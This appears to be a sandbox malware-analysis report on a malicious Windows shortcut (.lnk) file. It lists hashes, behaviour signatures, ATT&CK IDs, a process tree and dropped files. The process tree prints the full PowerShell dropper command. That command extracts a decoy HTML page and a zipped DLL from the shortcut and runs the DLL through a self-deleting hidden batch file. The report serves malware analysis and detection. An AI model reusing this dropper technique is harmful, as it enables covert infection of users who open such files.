5a3f1d14b9cc4890db64fbc41818d7039f25b0120574dcdec4e20d13e6b2740c

Analysis

max time kernel
204s
max time network
221s
platform
windows10-2004_x64
resource
win10v2004-20230915-en
resource tags

arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
submitted
11/10/2023, 11:21

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

5a3f1d14b9cc4890db64fbc41818d7039f25b0120574dcdec4e20d13e6b2740c_JC.lnk
Size

4.4MB
MD5

7336068f2c5ed3ed154b6c8b1d72726a
SHA1

e72c90aedd2ef27226d891f464caec19635a6fd3
SHA256

5a3f1d14b9cc4890db64fbc41818d7039f25b0120574dcdec4e20d13e6b2740c
SHA512

b40df901dbb97198652e83b2e701212d931e5182bc787bb47a9af3faea72151ad40ed7941c36fe0ea0c0151528bee23e458c4f716761fdfffde310e43ffd81b0
SSDEEP

98304:tgHgGZPRjDjDN/v1gFXzz3WC9rW4IowsS7gpfCRhPhajd7H/:tkPRj/DBNgF+CPIow57gIPIjdH/

Score

7^/10

themida

Malware Config

Signatures

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1045988481-1457812719-2617974652-1000\Control Panel\International\Geo\Nation	cmd.exe

Themida packer 1 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral2/files/0x000800000002320d-156.dat	themida

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
3632	powershell.exe
3632	powershell.exe
2676	msedge.exe
2676	msedge.exe
1856	msedge.exe
1856	msedge.exe
4932	identity_helper.exe
4932	identity_helper.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs

pid	Process
1856	msedge.exe
1856	msedge.exe
1856	msedge.exe
1856	msedge.exe
1856	msedge.exe
1856	msedge.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	3632	powershell.exe

Suspicious use of FindShellTrayWindow 25 IoCs

pid	Process
1856	msedge.exe
1856	msedge.exe
1856	msedge.exe
1856	msedge.exe
1856	msedge.exe
1856	msedge.exe
1856	msedge.exe
1856	msedge.exe
1856	msedge.exe
1856	msedge.exe
1856	msedge.exe
1856	msedge.exe
1856	msedge.exe
1856	msedge.exe
1856	msedge.exe
1856	msedge.exe
1856	msedge.exe
1856	msedge.exe
1856	msedge.exe
1856	msedge.exe
1856	msedge.exe
1856	msedge.exe
1856	msedge.exe
1856	msedge.exe
1856	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
1856	msedge.exe
1856	msedge.exe
1856	msedge.exe
1856	msedge.exe
1856	msedge.exe
1856	msedge.exe
1856	msedge.exe
1856	msedge.exe
1856	msedge.exe
1856	msedge.exe
1856	msedge.exe
1856	msedge.exe
1856	msedge.exe
1856	msedge.exe
1856	msedge.exe
1856	msedge.exe
1856	msedge.exe
1856	msedge.exe
1856	msedge.exe
1856	msedge.exe
1856	msedge.exe
1856	msedge.exe
1856	msedge.exe
1856	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 328 wrote to memory of 3300	328	cmd.exe	87
PID 328 wrote to memory of 3300	328	cmd.exe	87
PID 3300 wrote to memory of 3632	3300	cmd.exe	89
PID 3300 wrote to memory of 3632	3300	cmd.exe	89
PID 3632 wrote to memory of 1856	3632	powershell.exe	92
PID 3632 wrote to memory of 1856	3632	powershell.exe	92
PID 1856 wrote to memory of 1996	1856	msedge.exe	93
PID 1856 wrote to memory of 1996	1856	msedge.exe	93
PID 1856 wrote to memory of 2288	1856	msedge.exe	96
PID 1856 wrote to memory of 2288	1856	msedge.exe	96
PID 1856 wrote to memory of 2288	1856	msedge.exe	96
PID 1856 wrote to memory of 2288	1856	msedge.exe	96
PID 1856 wrote to memory of 2288	1856	msedge.exe	96
PID 1856 wrote to memory of 2288	1856	msedge.exe	96
PID 1856 wrote to memory of 2288	1856	msedge.exe	96
PID 1856 wrote to memory of 2288	1856	msedge.exe	96
PID 1856 wrote to memory of 2288	1856	msedge.exe	96
PID 1856 wrote to memory of 2288	1856	msedge.exe	96
PID 1856 wrote to memory of 2288	1856	msedge.exe	96
PID 1856 wrote to memory of 2288	1856	msedge.exe	96
PID 1856 wrote to memory of 2288	1856	msedge.exe	96
PID 1856 wrote to memory of 2288	1856	msedge.exe	96
PID 1856 wrote to memory of 2288	1856	msedge.exe	96
PID 1856 wrote to memory of 2288	1856	msedge.exe	96
PID 1856 wrote to memory of 2288	1856	msedge.exe	96
PID 1856 wrote to memory of 2288	1856	msedge.exe	96
PID 1856 wrote to memory of 2288	1856	msedge.exe	96
PID 1856 wrote to memory of 2288	1856	msedge.exe	96
PID 1856 wrote to memory of 2288	1856	msedge.exe	96
PID 1856 wrote to memory of 2288	1856	msedge.exe	96
PID 1856 wrote to memory of 2288	1856	msedge.exe	96
PID 1856 wrote to memory of 2288	1856	msedge.exe	96
PID 1856 wrote to memory of 2288	1856	msedge.exe	96
PID 1856 wrote to memory of 2288	1856	msedge.exe	96
PID 1856 wrote to memory of 2288	1856	msedge.exe	96
PID 1856 wrote to memory of 2288	1856	msedge.exe	96
PID 1856 wrote to memory of 2288	1856	msedge.exe	96
PID 1856 wrote to memory of 2288	1856	msedge.exe	96
PID 1856 wrote to memory of 2288	1856	msedge.exe	96
PID 1856 wrote to memory of 2288	1856	msedge.exe	96
PID 1856 wrote to memory of 2288	1856	msedge.exe	96
PID 1856 wrote to memory of 2288	1856	msedge.exe	96
PID 1856 wrote to memory of 2288	1856	msedge.exe	96
PID 1856 wrote to memory of 2288	1856	msedge.exe	96
PID 1856 wrote to memory of 2288	1856	msedge.exe	96
PID 1856 wrote to memory of 2288	1856	msedge.exe	96
PID 1856 wrote to memory of 2288	1856	msedge.exe	96
PID 1856 wrote to memory of 2288	1856	msedge.exe	96
PID 1856 wrote to memory of 2676	1856	msedge.exe	94
PID 1856 wrote to memory of 2676	1856	msedge.exe	94
PID 1856 wrote to memory of 2820	1856	msedge.exe	95
PID 1856 wrote to memory of 2820	1856	msedge.exe	95
PID 1856 wrote to memory of 2820	1856	msedge.exe	95
PID 1856 wrote to memory of 2820	1856	msedge.exe	95
PID 1856 wrote to memory of 2820	1856	msedge.exe	95
PID 1856 wrote to memory of 2820	1856	msedge.exe	95
PID 1856 wrote to memory of 2820	1856	msedge.exe	95
PID 1856 wrote to memory of 2820	1856	msedge.exe	95
PID 1856 wrote to memory of 2820	1856	msedge.exe	95
PID 1856 wrote to memory of 2820	1856	msedge.exe	95
PID 1856 wrote to memory of 2820	1856	msedge.exe	95
PID 1856 wrote to memory of 2820	1856	msedge.exe	95
PID 1856 wrote to memory of 2820	1856	msedge.exe	95
PID 1856 wrote to memory of 2820	1856	msedge.exe	95

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\5a3f1d14b9cc4890db64fbc41818d7039f25b0120574dcdec4e20d13e6b2740c_JC.lnk
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:328
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c powershell/W 01 $dirPath = Get-Location;$lnkpath = Get-ChildItem -Path $dirPath -Recurse *.lnk ^| where-object {$_.length -eq 0x0000472AC4} ^| Select-Object -ExpandProperty FullName;if($lnkpath.length -eq 0) {$dirPath = \"$env:temp\";$lnkpath = Get-ChildItem -Path $dirPath -Recurse *.lnk ^| where-object {$_.length -eq 0x0000472AC4} ^| Select-Object -ExpandProperty FullName;};$pdfFile = gc $lnkpath -Encoding Byte -TotalCount 00091900 -ReadCount 00091900;$pdfPath = \"$env:temp\securityMail_1101.html\"; sc $pdfPath ([byte[]]($pdfFile ^| select -Skip 004386)) -Encoding Byte; ^& $pdfPath;$exeFile = gc $lnkpath -Encoding Byte -TotalCount 04664004 -ReadCount 04664004;$exePath=\"$env:public\17399.zip\";sc $exePath ([byte[]]($exeFile ^| select -Skip 00091900)) -Encoding Byte;$shell = new-object -com shell.application;$zip = $shell.Namespace($exePath);if($zip.items().count -gt 0){$executemodule = $env:public + '\' + $zip.items().item(0).name;$shell.Namespace($env:public).CopyHere($zip.items().item(0), 1044) ^| out-null; remove-item -path $exePath -force;$batPath=\"$env:public\18105.bat\";$cmdline=\"rundll32.exe `\"$executemodule`\",Run`r`ndel /f /q %0\";sc $batPath $cmdline;start-process -filepath $batPath -windowstyle hidden;};
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3300
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell /W 01 $dirPath = Get-Location;$lnkpath = Get-ChildItem -Path $dirPath -Recurse *.lnk | where-object {$_.length -eq 0x0000472AC4} | Select-Object -ExpandProperty FullName;if($lnkpath.length -eq 0) {$dirPath = \"$env:temp\";$lnkpath = Get-ChildItem -Path $dirPath -Recurse *.lnk | where-object {$_.length -eq 0x0000472AC4} | Select-Object -ExpandProperty FullName;};$pdfFile = gc $lnkpath -Encoding Byte -TotalCount 00091900 -ReadCount 00091900;$pdfPath = \"$env:temp\securityMail_1101.html\"; sc $pdfPath ([byte[]]($pdfFile | select -Skip 004386)) -Encoding Byte; & $pdfPath;$exeFile = gc $lnkpath -Encoding Byte -TotalCount 04664004 -ReadCount 04664004;$exePath=\"$env:public\17399.zip\";sc $exePath ([byte[]]($exeFile | select -Skip 00091900)) -Encoding Byte;$shell = new-object -com shell.application;$zip = $shell.Namespace($exePath);if($zip.items().count -gt 0){$executemodule = $env:public + '\' + $zip.items().item(0).name;$shell.Namespace($env:public).CopyHere($zip.items().item(0), 1044) | out-null; remove-item -path $exePath -force;$batPath=\"$env:public\18105.bat\";$cmdline=\"rundll32.exe `\"$executemodule`\",Run`r`ndel /f /q %0\";sc $batPath $cmdline;start-process -filepath $batPath -windowstyle hidden;};
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3632
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\securityMail_1101.html
      4⤵
      Enumerates system info in registry
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      Suspicious use of WriteProcessMemory
      PID:1856
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa33c946f8,0x7ffa33c94708,0x7ffa33c94718
        5⤵
        
        PID:1996
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2208,12967548774817577642,15736437936556028373,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2272 /prefetch:3
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2676
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2208,12967548774817577642,15736437936556028373,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2916 /prefetch:8
        5⤵
        
        PID:2820
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2208,12967548774817577642,15736437936556028373,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2220 /prefetch:2
        5⤵
        
        PID:2288
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,12967548774817577642,15736437936556028373,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3256 /prefetch:1
        5⤵
        
        PID:3968
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,12967548774817577642,15736437936556028373,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3244 /prefetch:1
        5⤵
        
        PID:2444
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,12967548774817577642,15736437936556028373,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5096 /prefetch:1
        5⤵
        
        PID:4984
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,12967548774817577642,15736437936556028373,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5140 /prefetch:1
        5⤵
        
        PID:4052
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,12967548774817577642,15736437936556028373,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5616 /prefetch:1
        5⤵
        
        PID:780
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,12967548774817577642,15736437936556028373,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5644 /prefetch:1
        5⤵
        
        PID:5032
    - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2208,12967548774817577642,15736437936556028373,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6076 /prefetch:8
        5⤵
        
        PID:3644
    - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2208,12967548774817577642,15736437936556028373,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6076 /prefetch:8
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4932
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Public\18105.bat" "
      4⤵
      PID:3840
    - - C:\Windows\system32\rundll32.exe
        
        rundll32.exe "C:\Users\Public\mfc100.dll",Run
        5⤵
        
        PID:4456

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3460

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4528

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
db9dbef3f8b1f616429f605c1ebca2f0

SHA1
ffba76f0836c024828d4ff1982cc4240c41a8f16

SHA256
3e0297327872058355ac041a5e0fc83ed017faee0f6c0105b44bb3e5399a93a1

SHA512
4eedc387fe304f27f9d52ff5d71461c7f22147f7a8c18b8e7982acb76515528a36486a567451daafe093f9563b133c6799f2ad046e04256ccb46c83eb99e86c5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
111B

MD5
285252a2f6327d41eab203dc2f402c67

SHA1
acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6

SHA256
5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026

SHA512
11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
1eda1772ec89c7148bf4d9d7fd3173a7

SHA1
71a0aec70ddb6c85410b87316fea5eb9432e1004

SHA256
94e16454c8f8f983891848845a7b032365cc7770987227b1c9b9bdfbdf23c0ea

SHA512
a7ad13682d57aa9281498139257477f4f89e13a813dffa7292adc7697d7527b2da1399122ca8084695adcfdace27b9bd2f190119553a8ddef5fd7532fed35535

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
6d42f0b759df2c630fd3e7f65a8d1f7a

SHA1
3cbf8f2f5c2abdca95bc90f6e3b0134623125be5

SHA256
ee77c6510255d7d743e5c9c924ae563d473d969dc9f97b9ddc2d277f16c50a5a

SHA512
0574c03f15b8e13307b8df94c85387f2550845c7ca967ab1c338e8e907ac09471f4dde959ebb98d91ee5ce9eb6599568708987377e1d5dcc17c7fe94b94e48b4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

Filesize
24KB

MD5
6dcb90ba1ba8e06c1d4f27ec78f6911a

SHA1
71e7834c7952aeb9f1aa6eb88e1959a1ae4985d9

SHA256
30d89e5026668c5a58bef231930a8bfb27ca099b24399a2615b210210d418416

SHA512
dc31807eaeb5221ac60d598035ca3ccab1dbeecc95caaff5e1f5a2a89ba1c83ef0a708ee0b8ed05b588ea5d50e360032a534356f84c89d3791df91d419daeff9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
c931eaf638d0470e7fd7be86303b7c55

SHA1
69753538289c5da20773a3a099aef456027f614f

SHA256
98078af921aacc93346d63fcca4988ccc6456186f79da95bde3534cff09a192e

SHA512
dc9ce0f06a0b51ede01646b1355d0222030a016da11581cfb1eca5ddb1325190db42a9612b096837bdd9c0c2cfa9b2e9a54cf6c4bb8b4fa0e71ae97af41717d4

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_icfxun0h.nge.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\securityMail_1101.html

Filesize
85KB

MD5
da0504d53d08ab2110b4adcd35ed3721

SHA1
a9e9d85e92c5e7f82fbcacfe7a11c0869b636461

SHA256
15fc316bcf910a95783e4a13a31aa772635eb6f9cbc2324775c4ab14f37a37b0

SHA512
e442ac34b1035fdbd6554224ec295e11972a2c0f31eb4e4ae0de33a23ca4fa18ae31e8bc16f508f3463cc7b263d3a255a6c702934c015a8b36ce31283d8389e3

Download Submit
C:\Users\Public\17399.zip

Filesize
4.4MB

MD5
69da7c34be35ce0f926ea7521d8cbeda

SHA1
a9b244723035962f20935afa9b7223efd0cd2988

SHA256
9a4c61cdf0e291dc364c568aa161f744f59065efeafc72a3f892e12cbf88fc5b

SHA512
0ec46520e04b49c7bcbcdb8e9a80218970a7be6b2b131a334c1c4d40230a172cc7068d3ecf45fbdf5cdb51186a5b0404bc0150935a39c573ed9df78afb56b0ef

Download Submit
C:\Users\Public\18105.bat

Filesize
61B

MD5
703256cf6fe1afbf83deb7f5512b452d

SHA1
f81b226cafd5b8d515a337dd17a8c3dd9610582d

SHA256
c4029a2f1d0c07ae2b388b5a4076fba41e57af0dd0d2d0f86844464f22d63861

SHA512
495989c941684020a309c628f9fab1a3bcdde8a36eb2ea4e49f784065a2557a8243c0c57665bc6cd4ec4316cddbd8681d4834e7365a72ffd9ba178987d38395f

Download Submit
C:\Users\Public\mfc100.dll

Filesize
4.4MB

MD5
cb675bbebcc4a77cf5a3b341734b84de

SHA1
39663e144dc00e3eff004895347a91cb78a6f675

SHA256
0e926d8b6fbf6f14a2a19d4d4af843253f9f5f6de337956a12dde279f3321d78

SHA512
d1c3f47730a2c53a5194f71b324940b62585f3d71d3beabac79de4ffe4ab176a8e9dd5bafe919bc6b822b514d16353ac30af866389d54a8befbc50012ab1713c

Download Submit
memory/3632-13-0x000001997AC00000-0x000001997AC10000-memory.dmp

Filesize
64KB

Download
memory/3632-36-0x000001997AC00000-0x000001997AC10000-memory.dmp

Filesize
64KB

Download
memory/3632-23-0x00007FFA403D0000-0x00007FFA40E91000-memory.dmp

Filesize
10.8MB

Download
memory/3632-7-0x000001997C540000-0x000001997C562000-memory.dmp

Filesize
136KB

Download
memory/3632-12-0x000001997AC00000-0x000001997AC10000-memory.dmp

Filesize
64KB

Download
memory/3632-11-0x000001997AC00000-0x000001997AC10000-memory.dmp

Filesize
64KB

Download
memory/3632-10-0x00007FFA403D0000-0x00007FFA40E91000-memory.dmp

Filesize
10.8MB

Download
memory/3632-159-0x00007FFA403D0000-0x00007FFA40E91000-memory.dmp

Filesize
10.8MB

Download